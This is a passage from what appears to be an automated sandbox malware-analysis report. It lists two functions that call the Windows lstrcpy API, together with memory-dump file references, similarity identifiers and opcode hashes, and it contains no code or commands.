                        • lstrcpy.KERNEL32(00000000,?), ref: 00921649
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: c28c39acb424bf1aae10d86c1184b610381d25b0a99cc37ee1417042905790b4
                        • Instruction ID: eb88faf2a4044f0202fa9786ce6a11d1c2dddbe42c36b28faaa7e8e7f024de33
                        • Opcode Fuzzy Hash: c28c39acb424bf1aae10d86c1184b610381d25b0a99cc37ee1417042905790b4
                        • Instruction Fuzzy Hash: 78211974611B029FD734DF2AE598B1BB7F8AF94700B14491CA496C7A84DB30F851CB90
                        Function 00901610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 0090162D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090164F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901671
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901693
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 3a0f40bc9216f044724ceb6abc49f6e0b91bfb4b511127124bacff8934835973
                        • Instruction ID: e5501a31f1ff26a60ccb34ec2e1d733512635873d199c838ca9ee6ab6ed716c2
                        • Opcode Fuzzy Hash: 3a0f40bc9216f044724ceb6abc49f6e0b91bfb4b511127124bacff8934835973
                        • Instruction Fuzzy Hash: F711FE74A11B02AFDB249F75D95C926B7FCBF44701718452DA496D3B80EB31E841DB90